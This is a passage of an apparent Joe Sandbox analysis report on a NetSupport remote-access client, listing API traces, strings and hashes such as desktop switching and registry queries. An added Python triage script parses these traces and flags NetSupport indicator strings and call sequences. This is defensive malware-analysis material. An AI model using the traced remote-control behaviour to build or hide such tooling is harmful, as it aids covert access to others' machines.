                                                                                        • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11132C60
                                                                                        • GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                        • API String ID: 1170620360-4157686185
                                                                                        • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                        • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                        • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                        • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        • _strncpy.LIBCMT ref: 111451FA
                                                                                          • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                        • API String ID: 3299820421-2117887902
                                                                                        • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                        • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                        APIs
                                                                                        • _strtok.LIBCMT ref: 11026C26
                                                                                        • _strtok.LIBCMT ref: 11026C60
                                                                                        • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strtok$Sleep
                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                        • API String ID: 2009458258-3774545468
                                                                                        • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                        • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                        • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                        • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
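Added example, not part of the Joe Sandbox report and not code from Joe Security or NetSupport: a Python triage helper that parses API-trace bullet lines and String ID lines of the kind shown in the function blocks above, annotates the raw hexadecimal arguments with the Windows SDK constants they encode (SC_MANAGER_ALL_ACCESS, SERVICE_QUERY_STATUS, CSIDL_PROGRAM_FILES_COMMON, MAXIMUM_ALLOWED, HKEY_LOCAL_MACHINE and the like), and flags the call sequences and strings this report ties to the NetSupport client: polling of the ProtectedStorage service status, OpenDesktopA followed by SetThreadDesktop, the NSMWClass window class and the NSM.LIC, NSA.LIC and Software\NSL artifacts. The sample input is copied from the report's own trace lines; the constant table, the indicator string set and the sequence rules are the example's assumptions, not report output.

```python
"""Triage helper for Joe Sandbox API-trace blocks (added example, not report tooling)."""
import re
from collections import namedtuple

# Constructed input: API and String ID lines copied from five function blocks of this report.
SAMPLE = r"""APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,1B492F88,?,00000000,00000000), ref: 1102CE44
• OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
• Sleep.KERNEL32(00000032), ref: 1102CE86
• String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
APIs
• wsprintfA.USER32 ref: 11132C60
• SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
• String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$runplugin.exe$schplayer.exe
APIs
• RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
  • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
APIs
• GetCurrentThreadId.KERNEL32 ref: 11102C6C
• OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
• SetThreadDesktop.USER32(00000000), ref: 11102C90
APIs
• GetSystemMetrics.USER32(00000021), ref: 11133EE9
• CreateWindowExA.USER32(00000001,NSMWClass,02E00138,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
• String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass
"""

ApiCall = namedtuple("ApiCall", "api module args ref subcall")

# One trace bullet: optional "Part of subcall function X:", then Api.MODULE(args), ref: addr
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Windows SDK meanings of raw hex arguments, keyed by (api, zero-based arg index); example's own table.
CONSTANTS = {
    ("OpenSCManagerA", 2): {0x000F003F: "SC_MANAGER_ALL_ACCESS"},
    ("OpenServiceA", 2): {0x00000004: "SERVICE_QUERY_STATUS"},
    ("OpenDesktopA", 3): {0x02000000: "MAXIMUM_ALLOWED"},
    ("SHGetFolderPathA", 1): {0x2B: "CSIDL_PROGRAM_FILES_COMMON"},
    ("RegOpenKeyExA", 0): {0x80000002: "HKEY_LOCAL_MACHINE"},
    ("RegOpenKeyExA", 3): {0x00000001: "KEY_QUERY_VALUE"},
    ("GetSystemMetrics", 0): {0x21: "SM_CYSIZEFRAME", 0x0F: "SM_CYMENU", 0x04: "SM_CYCAPTION"},
    ("GetDeviceCaps", 1): {0x5A: "LOGPIXELSY"},
}
# Strings from this report's blocks that belong to the NetSupport client (assumed indicator set).
NETSUPPORT_STRINGS = {"NSMWClass", "NSM.LIC", "NSA.LIC", "Software\\NSL", "runplugin.exe", "schplayer.exe"}


def parse_blocks(text):
    """One dict per 'APIs' header: the block's direct and subcall calls plus its String ID entries."""
    blocks = []
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            blocks.append({"calls": [], "strings": []})
        elif not blocks:
            continue
        elif (m := API_RE.search(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blocks[-1]["calls"].append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            blocks[-1]["strings"] += [s for s in line.split(":", 1)[1].strip().split("$") if s]
    return blocks


def decode_args(call):
    """Annotate hex arguments CONSTANTS knows, e.g. '000F003F=SC_MANAGER_ALL_ACCESS'."""
    out = []
    for i, a in enumerate(call.args):
        if not re.fullmatch(r"[0-9A-Fa-f]+", a):      # '?' or a literal such as ProtectedStorage
            out.append(a)
            continue
        value = int(a, 16)
        if call.api == "Sleep" and i == 0:
            out.append(f"{a}={value} ms")
        else:
            name = CONSTANTS.get((call.api, i), {}).get(value)
            out.append(f"{a}={name}" if name else a)
    return out


def find_indicators(block):
    """Flag call sequences and strings in one block that match the report's NetSupport findings."""
    calls = [c for c in block["calls"] if c.subcall is None]      # direct calls only
    names = [c.api for c in calls]
    hits = []
    svc = next((c for c in calls if c.api == "OpenServiceA"), None)
    if svc and "QueryServiceStatus" in names:
        hits.append(f"polls status of service '{svc.args[1]}'"
                    + (" (with Sleep between polls)" if "Sleep" in names else ""))
    if "OpenDesktopA" in names and "SetThreadDesktop" in names:
        hits.append("moves calling thread to another desktop (OpenDesktopA -> SetThreadDesktop)")
    for c in calls:
        if c.api == "CreateWindowExA" and len(c.args) > 1 and c.args[1] in NETSUPPORT_STRINGS:
            hits.append(f"creates window of class '{c.args[1]}'")
    hits += [f"NetSupport artifact string '{s}'" for s in block["strings"] if s in NETSUPPORT_STRINGS]
    return hits


if __name__ == "__main__":
    for n, block in enumerate(parse_blocks(SAMPLE)):
        print(f"block {n}")
        for c in block["calls"]:
            print("  ", ("sub " if c.subcall else "") + f"{c.api}.{c.module}", decode_args(c))
        for h in find_indicators(block):
            print("   !", h)
```

To run it over a saved copy of this report, replace SAMPLE with the file's text; the parser keys only on the "APIs" header, the bullet lines and the "String ID" line, so the Memory Dump Source and hash lines between blocks are ignored. Subcall lines are parsed but excluded from the sequence rules, since they describe a callee's behaviour rather than the block's own control flow.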
                                                                                        APIs
                                                                                          • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                        • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                        • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                        • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                        • GetLastError.KERNEL32 ref: 11102CB1
                                                                                        • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                        • GetLastError.KERNEL32 ref: 11102CCF
                                                                                        Strings
                                                                                        • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                        • API String ID: 2036220054-60805735
                                                                                        • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                        • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                        • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                        • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                        • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                        • wsprintfA.USER32 ref: 1115E3C8
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                        • API String ID: 1734919802-1728070458
                                                                                        • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                        • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • std::exception::exception.LIBCMT ref: 1111013A
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                        • API String ID: 1976012330-1024648535
                                                                                        • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                        • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                        • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                        • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                        APIs
                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,1B492F88,00000000,?,00000000), ref: 11060874
                                                                                        • _malloc.LIBCMT ref: 110608BB
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1B492F88,00000000), ref: 110608FB
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                        • _free.LIBCMT ref: 11060974
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                        • API String ID: 999355418-161875503
                                                                                        • Opcode ID: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                        • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                        • Opcode Fuzzy Hash: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                        • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1B492F88,00000000,?), ref: 1115BA67
                                                                                        • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                        • wsprintfW.USER32 ref: 1115BAA7
                                                                                        • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                        • wsprintfW.USER32 ref: 1115BB67
                                                                                        • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
